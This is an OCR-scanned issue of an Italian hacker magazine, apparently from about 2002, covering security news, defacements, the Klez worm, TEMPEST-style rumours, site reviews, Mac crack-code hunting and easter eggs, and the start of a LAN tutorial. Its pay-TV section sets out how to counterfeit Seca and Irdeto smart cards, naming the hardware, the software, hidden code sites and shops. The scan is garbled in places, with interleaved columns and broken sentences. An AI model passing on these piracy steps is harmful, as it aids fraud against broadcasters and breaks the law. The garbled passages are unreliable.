3 MICROSOFT BASELINE SECURITY ANALIZER □ 


Annunciato per la prima volta a fine febbraio, il 
Microsoft Baseline Security Analyzer (MBSA) è 
oggi pronto per essere liberamente scaricato dal 
Web. Si tratta di un nuovo tool per la sicurezza il 
cui compito è quello di scovare vulnerabilità e de¬ 
bolezze note che possono mettere in pericolo la 
privacy e la sicurezza degli utenti che utilizzano 
Windows NT4/2000/XR Oltre al sistema operati¬ 
vo, MBSA è in grado di analizzare Internet Infor¬ 
mation Server dalla versione 4.0 in poi, SQL Ser¬ 
ver 7.0 e 2000, Office 2000 e XR II programma gi¬ 
ra su Windows 2000 e Windows XP ma, attra¬ 
verso una connessione di rete, è in grado di con¬ 
trollare anche i sistemi su cui giri Windows NT 4. 
MBSA rimpiazza il precedente Microsoft Personal 
Security Advisor, uno scanner basato sul Web ri¬ 
lasciato nell'aprile del 2000 ed oggi non più attivo. 


A differenza di quest'ultimo, MBSA si rivolge an¬ 
che agli amministratori di rete, ai quali dedica la 
possibilità di analizzare e gestire i report di più si¬ 
stemi attraverso la specificazione di un nome di 
dominio o di un range di indirizzi IR II nuovo scan¬ 
ner integra inoltre le funzionalità di due altri tool 
per la sicurezza: l'HFNetChk, con cui condivide la 
tecnologia XML e buona parte del motore di scan¬ 
sione, e lISLockdown Tool, dal quale eredita le 
routine per lo scanning di IIS. Al pari di HFNetChk, 
il nuovo scannerone di Microsoft può essere lan¬ 
ciato anche a riga di comando attraverso l'ese¬ 
guibile "Mbsacli.exe". 

Per scaricarlo: http:// download, micro- 
soft.com/download/win2000platform/ 

I ristali/1.0/l\IT5XP/EN-US/mbsase- 
tup.msiS 


LA "FIRMA DEL MAESTRO" 


C hi viola un sistema e opera il defacement di 
un sito Web, ha in genere uno scopo pre¬ 
dominante: farsi conoscere! 

Non contento de! suo livello di popolarità, il 
cracker italiano Spabaton ha deciso di inseri¬ 
re sull'home page del comune di Cisternino, in 
provincia di Brindisi, un dettagliato elenco delle 
sue "bravate", elencando tutte le intrusioni. Per 
non confondere il lettore tra tanti indirizzi elen¬ 
cati, il cracker ha anche pensato di evidenziare 
i nomi dei siti che ritiene più importanti, e che 
portano maggiore prestigio, con un apposito 
asterisco (Benelli, BBC, BancaMarche, SIAE, 
Scavolini ecc.). Bl 


O LA GUERRA MEDIORIENTALE SI TRASFERISCE □ 
IN INTERNET 


Lo scontro tra israliani 
e palestinesi ormai non 
si limita più al teatro fi- 
sico delle operazioni 
che già di per sé risulta 
piuttosto cruento, ma 
sembra essersi spostato anche in rete e si 
combatte a colpi di intrusioni sui server delle 
rispettive fazioni in lotta. 

Il servizio investigativo mi2g ha infatti rileva¬ 
to che i domini aventi TLN ".il" hanno subito il 
67 % di tutti i defacement realizzati nel corso 
delle ultime 2 settimane (10 dei 15 deface¬ 
ment che sono stati contati in area medio¬ 
rientale appartengono a domini israeliani). 


Ma il conflitto virtuale non si ferma al deface¬ 
ment di siti appertenenti alle due fazioni in 
guerra. 

Lo scontro si è spostato anche sul piano del¬ 
la satira, quella feroce, è stato messo infatti 
in circolazione un virus, Mylife, che una vol¬ 
ta entrato nel sistema si insedia ma non pro¬ 
cura come al solito perdite di dati o crash di 
sistema spettacolari e irrimediabili, bensì mo¬ 
stra una carica¬ 
tura piuttosto ir¬ 
riverente del pri- ^ 
mo ministro 
israeliano A. 

Sharon. SI 



""NON HHI VERAMENTE CAPITO QUALCOSA FINO A QUANDO 
NON SEI IN GRADO DI SPIEGARLO A TUA NONNA*’ 

Albert Einstein 


tJMtUOt: 


4-X.OKO 


3 CRACKER TUTTA 
CASA E CHIESA. 

S embra che i cracker di mezzo mondo 
abbiano intensificato gli attacchi 
ai siti di carattere religioso in particolare 
quelli cristiani e cattolici. Tra i quelli colpiti 
vi sono anche due siti italiani dell'Università 
Cattolica del Sacro Cuore. Il primo dei due, 
http://www.dirigentiscuola.org/, 
è il sito del Centro d'Ateneo per l'Educazione 
Permanente e a Distanza ed è stato 
prontamente ripristinato. Il secondo è un proxy 
server, http://proxyexit.bs.unicatt.it/. H 

O A VOLTE 
RITORNANO... 

h| uove varianti del worm klez.g, klez.h 
III e klez.k si stanno rapidamente 
diffondendo a macchia d'olio. 

Il worm contiene al suo interno un mail 
server autonomo in grado di inviare mail 
ad una grande quantità di utenti. Consigliamo 
a tutti i lettori di aggiornare le proprie basi 
antivirus e di scaricare le fix apposite 
sui siti dei maggiori produttori di antivirus. Bl 


O CANCELLAZIONE 
FORZATA 

Ì a denuncia arriva dalla Lavasoft, 
produttrice di Adware, software che 
consente agli utenti di liberarsi di programmini 
nascosti e web bug installati ad insaputa 
dell'utente da software con pochi scrupoli. 

È Radlight, che, una volta installato, cancella 
definitivamente dal proprio PC Adware, 
privando gli utenti di uno degli strumenti più 
preziosi contro gli spyware. Bl 
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MITI E 


LE LEGGENDE "METROPOLITANE" INFORMATICHE 



Numeri da circo 
e paranoia digitale 


Può il lampeggiare di un led suggerire indicazioni sulle infurmaziuni che uenguno 
trasmesse? Oppure: si può ricostruire la schermata di un PC “scannerizzando” la 
fluorescenza del uolto di chi ci sta seduto di fronte? Nella rete pullulano uoci 


assolutamente incredìbili, ma non sempre si tratta di leggende metropolitane... 


M 


urfando in giro per il web possia¬ 
mo trovare una quantità di notizie, 
articoli, scritti, se non studi veri e 
propri, inerenti ai più svariati ed improbabili 
argomenti: c'è qualcuno che ha tempo e su¬ 
dore da buttare nel descriverci per filo e per 
segno come costruire una spada laser funzio¬ 
nante utilizzando comuni materiali acquistabi¬ 
li in supermercati e negozi di elettronica; gen¬ 
te che si prodiga nel trattare ed illustrare mille 
maniere diverse di girarsi gli spinelli, o addirit¬ 
tura chi ha fatto "reverse engineering" alla 
Cocacola e ha pubblicato sul web la propria 


ricetta, dalla quale poter ottenere una bevan¬ 
da assolutamente identica nell'aspetto e nel 
gusto alla famosa bibita, per poi rilasciarla 
sotto licenza GPL come fosse un software 
open source. 

Tra le cose più intriganti, tuttavia, possiamo 
pescare alcuni studi, spesso molto seri e svolti 
in ambito accademico, che riguardano la teo¬ 
rizzazione di sistemi atti allo spionaggio, alla 
cattura di dati e alla sicurezza informatica. 

Joe Loughry, impiegato presso la Lockheed 
Martin, sostiene, per esempio, che il led in¬ 
termittenti che lampeggiano frenetica¬ 


mente su modem, router, schede di rete e 
quant'altro, possano rappresentare un serio 
rischio alla privacy dei nostri dati, rivelando ciò 
che effettivamente passa attraverso queste pe¬ 
riferiche. 

» Dimmi che Led hai 
e ti dirò chi sei... 

L'idea è che un led, illuminandosi in funzio¬ 
ne del traffico di dati che il dispositivo riceve 
ed invia, funzioni "come una fibra ottica, ma 
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senza le fibre". Il simpatico Joe ci fa sapere 
che tutto questo sfarfallio di lucette rappresen¬ 
ta un "linguaggio binario interpretabile" e che 
mediante un sensore ottico sia possibile carpi¬ 
re le informazioni fino a ben venti metri di di¬ 
stanza: la soluzione è rappresentata da qual¬ 
che metro di nastro adesivo atto a coprire 
qualsiasi led sulle nostre periferiche. Lo studio 
di Joe Loughry è reperibile @ http://ap- 
plied-math.org/optical_tempest.pdf. 

Per quanto stramba possa apparire questa 
notizia, data l'effettiva quasi-impossibilità di 
una implementazione di questa tecnica di snif- 
fing (perché di vero e proprio sniffing si tratte¬ 
rebbe), la rete è tutt'altro che avara quando si 
tratta di propinarci simili studi: c'è chi è pron¬ 
to a giurare che sia possibile catturare le in¬ 
formazioni che passano attraverso un cavo di 
rete utilizzando un qualche dispositivo che ri¬ 
levi le microscopiche variazioni nel campo 
elettromagnetico prodotto dal flusso di dati. 

» Hai la faccia come 


lo schermo... 


Non solo: tempo fa alcuni studenti ameri¬ 
cani pubblicarono una loro ricerca nella qua¬ 
le sostenevano la possibilità di ricostruire la 
schermata di un monitor lontano anche cin¬ 
quanta metri, mediante un apparecchio che 
avrebbe dovuto rilevare le variazioni di cam¬ 
po prodotte dal fascio di elettroni emesso 
dal tubo catodico. Su questa stessa linea, 
più di recente, un altro studente americano ha 
affermato che si potrebbe risalire ad una 
schermata "perfettamente leggibile" catturata 
da un monitor, andando a scannerizzare il 
volto illuminato dalla fluorescenza dello scher¬ 
mo di chi ci sta seduto davanti. 

Alla via così: le teorie e le supposizioni sul 
"cosa sarebbe possibile fare se" si sprecano e 
danno spunti a discussioni interminabili (spes¬ 
so tra fisici ed ingegneri elettronici più che tra 
informatici ed esperti di sicurezza), e se da un 
lato tali "sparate" sembrano lasciare il tempo 
che trovano, dall'altro appaiono suggestive e 
geniali; ma c'è chi le prende sul serio. 

Non voglio qui aprire un flame su argo¬ 
menti tecnici e specifici, e possiamo anche 
ammettere che tutti questi studi abbiano un 
concreto fondo di verità (e probabilmente ce 
l'hanno): ciò che maggiormente dà da riflette¬ 
re è la paranoia con cui proprio l'ambiente 
underground e quello più professionale della 
sicurezza informatica accolgono tali informa¬ 
zioni. 

C'è davvero qualcuno che ha appiccicato 
nastro adesivo sulle lucette del proprio 
modem, o che ha buttato via il suo monitor 
per comprarne uno a cristalli liquidi? Non lo 



3 Tra invenzioni e paranormale: 

http://paranormal.about.com 
3 Strane teorie e follie assortite: 

http://all-ez.com/science.htm 
3 Tecno: http://www.geocities.com/ 
CapeCanaveral/Lab/3354/index3.html 


so, ma frequentando mailing list e forum ho 
notato con quanta serietà venga letta la più 
assurda delle idee inerenti la sicurezza infor¬ 
matica e la privacy. 


disquisire su come annullare i campi elettro- 
magnetici generati da un monitor, una venti¬ 
na di nuovi bachi vengono scoperti e altret¬ 
tanti exploit pubblicati su securityfocus: in mez¬ 
zo a tutta questa confusione i più sensati ed in¬ 
telligenti, per una volta, appaiono gli utenti 
meno esperti e smaliziati, che si fanno 
una risata e passano alla prossima. 

Mentre magari inoltrano a tutti i 
propri contatti l'ultima email- 


» Tra scenari irreali 
e rischi concreti 


(.underground e paranoico e ciò gli e pecu¬ 
liare. Ogni più remota possibilità di sniffare 
password, carpire dati, violare in 
qualche modo l'inte- 
grità di un si- 
sterna infor- 
malico vie- 
ne presa in 
considera-f 
zione e dis-V^ 
cusso. 

E questo è % 

senza dubbio % 

un bene: i migliori 
responsabili di sicurezza 'V 
informatica sono quelli che 
obbligano chiunque abbia un ac¬ 
cesso privilegiato alle macchine (anche fosse il 
capo J) ad utilizzare smart password, e a cam¬ 
biarle ogni 2 settimane; quelli che fanno im¬ 
pazzire un cliente pretendendo che l'accesso 
FTP al server 


FOLLIE IN RETE 


centrale sia effettuato da un solo 
IR che effettuano un test approfondito su qual¬ 
siasi vulnerabilità conosciuta (anche quelle 
meno rischiose e all'apparenza più insignifi¬ 
canti)... e via così. 

Ma la coerenza è spesso virtù dei folli: 
quando si dibatte per giorni su che tipo di na¬ 
stro adesivo sia più utile usare per coprire quei 
maledetti LED, si perdono di vista i problemi 


Secondo uno studio pubblicato on- 
line, dalla scansione di un volto 
;i può ricostruire la schermata del PC 
che aveva davanti: meglio prendere 
le opportune precauzioni... 
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NELLA RETE 


www2.securityinfos.com 


Onda fluadra 

www.ondaquadra.cjb.net 


Grande agglo¬ 
merato di noti¬ 
zie riguardanti 
proprio la sicu¬ 
rezza informati¬ 
ca, il sito di Se- 
curity Infos è 
stato anche il 
primo ad aderi¬ 
re alla nostra 
iniziativa e an- 
ch'esso collabo- 


"Fino a quando 
lo spirito umano 
sara' vivo, gli 
hacker esiste¬ 
ranno sempre. 
Può' darsi che 
dovremo com¬ 
battere una bat¬ 
taglia durissima 
se continueremo 
ad essere impri¬ 
gionati e vitti- 


ra in modo attivo ai contenuti, arricchendo Hacker mizzati a causa del nostro desiderio di esplorare. Ma 


Journal con il contributo di articoli e news che pro¬ 
vengono da uno staff di collaboratori esperti e pre¬ 
parati. 

Oltre a scrivere per noi e fornire una preziosa consu¬ 
lenza, quelli di Security Infos arricchiscono il loro sito 
con aggiornamenti quotidiani e news che provengo¬ 
no da ogni angolo del web. 

Si trovano recensioni di tutti i prodotti, specie hard¬ 
ware, utilizzati in tema di sicurezza e testati in modo 
severo, con anteprime molto interessanti. 

Le sezioni tuttavia sono molte e si dipanano tra se¬ 
zione di Tools, Libri ed Eventi. Una vera e propria mi¬ 
niera di risorse della sicurity e dintorni. 


questa repressione raggiungerà' tutti gli obiettivi tran¬ 
ne quello di fermarci" 

E. Goldstein, editore di 2600 

Questa è la suggestiva introduzione di uno dei siti di 
culto del WEB, quello di Onda Quadra, sottotilo 
"stampa clandestina", che si pone come una vera e 
propria rivista on-line dedicata al mondo della sicu¬ 
rezza. Si possono scaricare gli articoli zippati della e- 
zine e degli allegati. 

Pochi fronzoli e una grande quantità di contenuti al¬ 
la portata non proprio di tutti, ma soprattutto di un 
pubblico più tecnico. 



www.spaghettihacker.it 


www.hackerjournal.it 


5PRQHETTI HRCKER I "Spaghetti hacker 

e‘ un portolano, 
m una guida per le 
. rotte che attraver¬ 

sano il mondo an¬ 
cora sconosciuto 
• Ét*t 4 f dell'hacking italia- 

' . no. Storie inedite, 

^ I avventure dei pro¬ 

tagonisti dell'un- 
- derground digita¬ 
le, un movimento 

con caratteristiche autonome rispetto a quello americano 
che esprime una “via italiana" nel complesso tema del rap¬ 
porto fra l'uomo e la tecnologia. Una via fatta di gioco, in¬ 
telligenza e passione per le macchine. Per la prima volta 
grazie a questo libro e' possibile". 

Un libro, un sito, l'analisi di una realtà, quella degli hacker 
italiani, poco conosciuta ma viva e attiva. 

Per conoscere meglio proprio la figura dell'hacker può tor¬ 
nare utile una visita al sito e, forse, anche l'acquisto del li¬ 
bro omonimo, anche se non è nostro compito fare pubblici¬ 
tà e non ce e viene una lira in tasca. 

Nel sito sono contenuti diversi stralci. 

Dimenticavamo gli autori: Neuro e Rubik, sono loro le "gui¬ 
de" incaricate alla navigazione delle misteriose vie del 


- - Un po' di auto ce- 

- lebrazione non 

gusta mai... 

Il nostro sito vuo¬ 
le proporsi come 
un contenitore 
non solo di risor¬ 
se ma, soprattut¬ 
to come un pro¬ 
getto Open Sour- 
~ - I ce dove è impor¬ 

tante, anzi fonda- 

mentale, l'apporto di tutti coloro che vorranno partecipa¬ 
re per inserire il proprio contributo e fare crescere il no¬ 
stro contenitore web. 

Nel sito trovano spazio Tools, ma soprattutto manuali per 
cercare di avere un approccio positivo all'argomento si¬ 
curezza. 

Per cercare di capire come realizzare una LAN o come 
rendere un sistema informatico sicuro basta, scaricare 
uno deitanti manuali/tutorial presenti. 

Non mancano la chat e il forum per fare sentire la vostra 
voce, che ci auguriamo sia forte. 

Ci aspettiamo un pubblico straripante , "rumoroso" e so¬ 
prattutto curioso . 

Alla realizzazione del progetto ha collaborato in mod at¬ 
tivo e prezioso il web -master di un'indirizzo web tra i pù 
noti della rete: 2600 Hertz. 











www.securityfocus.com 


www.bismark.it 


in tema di sicu- 
rezza e di analisi 
della vulnerabili¬ 
tà di un sistema, 

_I SecurityFocus 

rappresenta una 
Vi delle compagnie 

*■—* — piu avanzate che 

riversa in rete il 
proprio know 

«T ^51^—I how tutto 

spetto. Il sito, che 

riporta alla compagnia, presenta una serie di risorse 
assolutamente preziose per valutare in modo concreto 
la sicurezza di un sistema e la vulnerabilità di un data 
base. Nella sezione dei prodotti trova spazio, tra gli al¬ 
tri, Aris Analyzer un sistema di sicurezza IT professio¬ 
nale che serve a monitorare in modo costante il traffico 
e le intrusioni possibili aM'interno di un server o un da¬ 
ta base. Aris infatti analizza l'IP degli utenti collegati e 
individua immediatamente quelli anonimi segnalando¬ 
li come possibile fonte di un attacco informatico. Inoltre 
tiene traccia di tutti gli attacchi effettuati e consente di 
individuarne la provenienza. Aris Analizer, come diver¬ 
si altri prodotti, possono essere scaricati previa regi¬ 
strazione per testarne l'efficacia. 


Un punto di rife- 
] . /j" ... rimento molto 

^ seguito nel setto¬ 

re dei network 
_ security/ under- 

ground è rappre- 
Ifófirj sentato senz'al- 
["•58S tro da Bismark 
che si presenta, 
di fatto, come un 
sito non solo di 
risorse ma anche 

di news, articoli e soprattutto di link. Quelli di Bismark 
hanno aderito al nostro giornale e ne sono una "costo- 
la attiva". 

In home page trovano spazio le quattro anime princi¬ 
pali di Bismark: la sezione news aggiornata quotidia¬ 
namente che riporta tutte le notizie più importanti in te¬ 
ma di sicurezza. Defaced, con una serie di link che ri¬ 
portano ai siti "violati". Non manca la sezione articoli 
che si muove tra tutorial veri e propri, come compilare 
un Kernel, oppure un bel corso di Kyiliz, e riflessioni ap¬ 
profondite sui temi più rilevanti del periodo. 

Infine Gnomix dove trova spazio un nutrito archivio di 
software liberamente scaricabile e un altrettanto nutrita 
sezione dedicata alla piattaforma Linux. 


www.punto-informatico.it 


www.secu 


”■ SSSipìi _i E'probabilmente il 

— sito italiano dedi- 

cato 

;. zione tecnologica 

■ più importante, si- 

_-‘ curamente il piu 

autorevole. 

’ jr visT Un punto di riferi- 

I -- r V _ mento storico per 

.«JQ ~ ■ r tutti coloro che VI- 

vono a contato con 
il settore delle 

nuove tecnologie. Punto-informatico ha una sezione di news 
assolutamente ineccepibile, aggiornata con grande frequen¬ 
za e spesso punto fisso per la rassegna stampa di tutti gli 
operatori del settore. Ma evidentemente Punto-informatico 
non è solo un portale di informazione, per quanto ben conce¬ 
pito, la sua anima è molto più complessa e finisce per rap¬ 
presentare un portale verticale dedicato al mondo informati¬ 
co in cui le risorse si fondono alla perfezione con le notizie. 
Nel sito trova spazio una sezione espressamente dedicata al¬ 
la sicurezza e aN'hacking, inutile dire che anche in questo ca¬ 
so la qualità del materiale contenuto è decisamente buona e 
Punto-informatico cerca di catturare l'attenzione di una co¬ 
munità, quella di chi si occupa a fattivamente di sicurezza, 
oppure di quelli che in qualche modo, anche solo per ricerca, 
stanno dall'altra parte della barricata.Ottimo il motore di ri¬ 
cerca personalizzabile. 


Il Papa è morto? 
No è vivo e vege¬ 
to... E' solo una 
delle notizie ri¬ 
portate da Secu¬ 
rity Flop che si 
occupa di segna¬ 
lare, appunto, i 
sistemi di 


sicu- 

_| rezza informatica 

che fanno Flop. 

Nel caso specifico, ripreso poi anche da Hacker Journal, 
il sistema violato è stato quello del sito di Rainews24 che 
aveva nel suo archivio un bel "coccodrillone" (così si 
chiamano i necrologi scritti prima della morte delia per¬ 
sona a cui sono rivolti) che è stato pescato nel server e 
svelato al popolo della rete. In home page ruotano tut¬ 
te le notizie dei siti violati. L'aggiornamento è davvero 
continuo e diccando su ogni singola notizia si apre una 
bella finestra Pop-Up dove si trova anche la foto del si¬ 
to attaccato e, spesso, degli effetti prodotti. 

Il sito si basa anche sulle segnalazioni generose degli 
utenti in rete ed è presente un Forum per lo scambio di 
informazioni rilevanti in tema di attacchi informatici. 
Per avere un panorama veramente completo di tutte le 
violazioni di sistemi che si verificano quotidianamente, 
un clic su questa uri è davvero ben speso... 
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GABOLE E TRUCCHI IN AMBIENTE MAC 


Il lato oscuro della “Mela” 

Quando si parla di tecniche di hacking, oppure di 
scorribande informatiche, l’attenzione è sempre riuolta 
a sistemi Windows o Linuu, ma anche gli utenti Mac non 
sono estranei a questo lato oscuro, anzi il Sgstem 
MacOS classic e il recente “Hqua” hanno un’indole 
particolarmente “diabolica”... 

♦ É»bb A i ♦ □ » ♦kdD ♦Elmi □ 5 / «s ^ 8 P ^ I 4*/* * ♦ rte 

è sempre ripetuto ossessiva¬ 
mente che gli utenti Macintosh 
sono sempre stati un po' dis¬ 
criminati rispetto ai "cugini" PC compatibi¬ 
li, la storia è sempre la stessa: i giochi ven¬ 
gono sviluppati prima per PC, poi even¬ 
tualmente, per Macintosh, Internet ha un 
occhio di riguardo solo per i possessori di 
Personal equipaggiati con sistemi Win¬ 
dows, tant'è che alcune pagine che utiliz¬ 
zano tecniche 3D non sono accessibili agli 
utenti della Mela perché non è disponibile 
un plug-in dedicato per visualizzare le pa¬ 
gine... e via dicendo. In mezzo a queste 
storie di ordinaria discriminazione verreb¬ 
be da pensare che anche in ambito sicu¬ 
rezza e hacking il Mac abbia poco da di¬ 
re, ma non è esattamente così... iti 


che diffondono codici per Mac testi¬ 
monia un interesse crescente. 

Forse il tutto è dovuto ad un costo 
a volte eccessivo dei software, forse 
il costo eccessivo è indotto proprio 
dalla pirateria dilagante, ma la¬ 
sciamo perdere questo circolo vizio¬ 
so e concentriamoci sui data-base 
di codici. Per individuare i siti da cui 
scaricarli è sufficiente navigare un 
po' e utilizzare le chiavi di ricerca 
giusta come "crack", "Mac" o giù di 
lì. Tuttavia se non avete molta pa¬ 
zienza un indirizzo prezioso è www. 
google.com/ mac.html qui trova 
spazio un motore di ricerca estre¬ 
mamente efficiente. M 



»Codìci e codicilli 

U na delle attività più in voga 
per una certa fascia di utenti 
Mac è la ricerca di codici per cracca¬ 
re i programmi. Ovvero l'individua¬ 
zione di chiavi informatiche che 
consentono di duplicare e fare fun¬ 
zionare programmi che altrimenti 
potrebbero essere utlizzati solo da 
chi è in possesso della licenza origi¬ 
nale. Evidentemente non si tratta di 
un'attività lecita, i codici e codicilli 
potrebbero essere tranquillamente 
quelli del codice penale perché si 
tratta di attività illegale, tuttavia il 
proliferare in Internet di data base 


EHSTER EGGS PER MRC 


N on sono illegali, non 
servono assoluta- 
mente a nulla, a volte 
fanno pure arrabbiare 
perché non funzionano. 
Sono le "Eggs", ovvero i 
programmini nascosti al¬ 
l'interno di programmi di 
grande diffusione e atti¬ 
vabili solo con combina¬ 
zioni segrete di tasti. 

Le Eggs sono inserite da¬ 
gli stessi sviluppatori per 
loro personale diverti¬ 
mento o per "staccare" 
da compiti più gravosi, 
il Mac presenta una ricca 
scelta di "uova 
pasquali". 


Dreamweaver 



Eseguite (Mela + F3) e 
selezionate un' 
immagine presente 
nella pagina HTML su 
cui state lavorando. 
Tenendo premuto il 
tasto Mela ed 
effettuando il doppio 
clic sull'anteprima 
visualizzata nella 
parte sinistra della 
finestra delle 
proprietà, vedrete gli 
sviluppatori. 


iTunes 


iTunes 2 


Aprite iTunes e 
selezionate la voce 
"Info su iTunes..." dal 
menu Mela e tenete 
premuto il tasto 
Opzione per invertire 
la visualizzazione dei 
titoli. 


Internet Explorer 5 



Funziona con tutte 
le versioni 5.0 del 
famoso browser. Basta 
scrivere nella barra 
degli indirizzi 
"about:tasman" (senza 
virgolette). Il software 
visualizzerà un easter 
egg legato ai 
Cascading Style Sheets. 


Photoshop 6 



Aprite Photoshop e 
tenete premuti i tasti 
Opzione + Mela e 
selezionate dal menu 
Mela la voce “About 
Photoshop..." per 
visualizzare una 
simpatica immagine. 
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IL FENOMENO DELLE SCHEDE PIRATA 


Il problema sbandierato da Stream e Tele+ è noto: 
gli utenti che hanno il priuilegio di guardare i programmi 
delle due pag-tu ammonta, grosso modo, a circa 4.5 
milioni di unita. Bene? Non proprio: la metà circa è 
rappresentata da possessori di schede tu pirata e sembra 
che la quota sia destinata ad aumentare... 




tream conta oggi 
800.000 abbonati, Te¬ 
le + qualcosa come 1,5 mi¬ 
lioni. Poi c'è il popolo degli 
utenti "ombra", quelli che ufficialmente 
non risultano negli elenchi delle pay-tv, 
ma che esistono... e guardano, eccome 
se guardano, grazie a schede non ufficia¬ 
li, o smari-card, programmate reperendo 
tutte le risorse in Internet. 


» I sistemi 
di codifica digitale 


N ell'attuale panorama della tv digitale 
esistono diversi sistemi di codifica del 
segnale, ognuno dei quali attaccabile in 
maniera diversa da chi vuole vedere i pro¬ 
grammi in chiaro senza spendere una lira 
o comunque risparmiando in modo so¬ 
stanzioso. 

Il sistema di codifica più attaccato 
è il Seca, utilizzato da Tele+. Si calcola 
che nel 2001 sono stati venduti circa 
800.000 decoder Seca (Gold box) senza 
abbonamento per essere attivati con 
Smart Card fasulle. Sul fronte Stream inve¬ 
ce è presente un doppio sistema di codifi¬ 
ca: Irdeto e il nuovo Nds, più sicuro e affi¬ 
dabile, è infatti certo che la moltitudine di 
persone che contraffanno le schede per 
Stream usano proprio il sistema Irdeto, te¬ 
nuto in vita perché a tutt'oggi circa la me¬ 
tà degli abbonati ufficiali Stream possiede 
un decoder Irdeto. 

Probabile che a breve Stream cerchi 
di svecchiare il parco decoder dei propri 
utenti e punti decisamente sul quelli che 
codificano il sistema Nds che, per la cro¬ 
naca, possono essere venduti solo con la 


sottoscrizione di un abbonamento, ma al 
momento permane questa situazione 
ibrida. 

Sul fronte Tele + si sta cercando di so¬ 
stituire il sistema Seca con il Seca 2, per 
implementare la sicurezza e combattere in 
modo sempre più efficiente la pirateria. 

»Tutta in rete 

Realizzare una smart-card o wafer- 
card pirata non è complicato come può 
sembrare. Il primo passo è quello di com¬ 
prare una smart-card vergine, ovvero 
programmabile. Si trova in qualsiasi ne¬ 
gozio di elettronica di consumo e costa 15 
euro circa. 

Quindi bisogna reperire un program¬ 
matore, non una persona in carne e ossa 
che "tarocchi" la scheda, ma un piccolo 
aggeggio che si può acquistare via inter¬ 
net proprio dai siti in cui si reperiscono tut¬ 
te le risorse per piratare le smart-card. Il 
costo è di circa 40/50 Euro il tutto vie¬ 
ne spedito comodamente a casa in modo 
anonimo e senza rischi. Poi bisogna repe¬ 
rire il software per farlo funzionare, questo 
lo si trova sempre in rete in modo del tut¬ 
to gratuito. Infine servono i codici. Tutti i si¬ 
ti da cui è possibile scaricare i codici per 
programmare le schede non sono censiti 
dai motori di ricerca, sono ben mimetizza¬ 
ti nella rete e risiedono su server situati al¬ 
l'estero. 

Nei siti in questione è possibile scarica¬ 
re sia i software che i codici in formato 
.hex. Inserirli nella scheda è poi un lavoro 
di circa 15 minuti e il gioco è fatto. 

Quando Tele+ cambia i codici basta 
scaricarli dalla rete e riprogrammare la 


scheda. Insomma con circa 55/60 Euro si 
guarda la pay-tv a sbafo senza spendere i 
circa 1.000 euro annuali dell'abbona¬ 
mento canonico. 

»Pirati “onesti” 

Molti pirati praticanti dicono di pro¬ 
grammare per passione e si augurano vi¬ 
vamente che tutti sottoscrivano almeno un 
abbonamento minimo per non esaspera¬ 
re i gestori delle pay-tv: magari fanno 
l'abbonamento a Tele-I- poi scaricano i 
codici per vedere in chiaro la program¬ 
mazione di "Palco", comunque un bel ri¬ 
sparmio. 

Tutti i siti che divulgano materiale che 
riguarda la contraffazione di schede sono 
fuorilegge, il fatto che siano situati su ser¬ 
ver stranieri e gestiti magari in remoto da 
amministratori italiani non mette questi ul¬ 
timi al sicuro, almeno secondo le recenti 
interpretazioni giurisprudenziali della leg¬ 
ge 248 del 2000 sulla pirateria informa¬ 
tica che prevede pene fino a 5 anni di re¬ 
clusione. 

E' perciò evidente che scovarli non sia 
semplice, ma basta avere pazienza e si tro¬ 
veranno tutti i codici del caso e i software 
necessari, ad esempio su diversi siti tede¬ 
schi è disponibile un software, two- 
prog23.exe, che permette di programmare 
tutte le carte in circolazione o quasi tra cui: 
atmel- waffer-goldwaffer-picard2-funcard. 

Dove acquistare Smart-card 
e programmatori: 
http://web.tiscali.it/italelectronics/ 
http://www.mixotron.com/indexold.html 
http://www.dimelonline.it/ 















PROTICO 


COME COSTRUIRE UNA LAN SU MISURA 


Introduzione alla LHN 


Fare andare d’accordo più persone può essere estremamente complicato, 
cercare di fare conuiuere più computer anche di più, specie se non si seguono 
le regole basilari nella costruzione di una LRN 



(( 


LAN 


d 


e / acroni- 
j j mo per Lo¬ 
cai Areo 
Network, 
ossia network 

locale: una rete di 2 o più macchine che 
condividono risorse tra loro, quali files, di¬ 
schi, stampanti etc... 

Avere diverse postazioni di lavoro inter¬ 
connesse tra loro è senza dubbio molto 
pratico, e praticamente necessario in tutte 
quelle situazioni ove si renda necessario 
poter fornire agli utenti la possibilità di 
condividere tra loro dati e macchine: ba¬ 
sti pensare al caso più classico, quello di 
un qualsiasi ufficio che utilizzi computer, o 
a tutti quei contesti in cui i calcolatori ven¬ 
gono forniti all'utenza a scopo consultati¬ 
vo (ospedali, fiere, musei etc...). 

Mo a volere osservare più da vicino la 
questione, possiamo iniziare a porci le so¬ 
lite domande curiose: come funziona? 
Com'è organizzata? Perché è importante 
conoscere le reti locali sotto l'ottica della 
sicurezza informatica? 


» Tutti insieme 
appassionatamente 

SgJK 

Come abbiamo già detto, una LAN 
altro non è che un insieme di compu¬ 
ter, collegati tra loro, che possono 
scambiarsi dati di vario tipo. 

Per cominciare volgeremo uno 
sguardo alle reti basate su sistemi 
Windows NT, riservando a prossimi ar¬ 
ticoli il compito di esaminare reti basa¬ 
te su altri sistemi operativi, anche con¬ 
siderata la relativa complessità gerar¬ 
chica su cui si basano le LAN costruite 
su questo SO. 

Difatti, all'interno di una rete i com¬ 
puter non sono tutti uguali: alcuni svol¬ 
gono il compito di client, tipicamente 
usati dagli utenti per compiere il nor¬ 
male lavoro di tutti i giorni; altre mac¬ 
chine si occupano, per esempio, di for¬ 
nire ai client una lista di tutte le risorse 
presenti sulla rete quando questi la ri¬ 


creare una rete 
di Pc può essere 
un'operazione molto 
complessa specie se 
"unità"collegate 
numerose 


chiedono, e altre ancora hanno l'arduo 
compito J di permettere a tutte le po¬ 
stazioni presenti sulla rete di uscire in 
internet. 

Un'ultima cosa, da tenere ben pre¬ 
sente: non sempre le reti sono omo¬ 
genee, basate cioè su un solo sistema 
operativo. In molti casi si rende neces¬ 
sario connettere tra loro macchine che 
montano SO diversi: tipica è la situa¬ 
zione in cui molti client Windows sono 
gestiti da un server Linux (ovviamente 
tramite un utilizzo corretto di determi¬ 
nati software, per esempio SAMBA). 


» Scala gerarchica 

Tralasciando queste considerazioni, 
occupiamoci di una ipotetica LAN ba¬ 
sata esclusivamente su Windows. Co¬ 
me più volte abbiamo già detto, ci sa¬ 
ranno macchine utilizzate dai normali 
utenti come postazioni di lavoro, dette 
workstation. Esse all'avvio, richiedono 
all'utente una autenticazione: è infatti 
molto importante il concetto di 


"User ", ovvero chi sta usando quella 
determinata macchina. Per ovvi motivi 
organizzativi e di sicurezza, è necessa¬ 
rio identificare gli utenti che stanno uti¬ 
lizzando un computer della LAN, in 
modo da poter stabilire regole atte a 
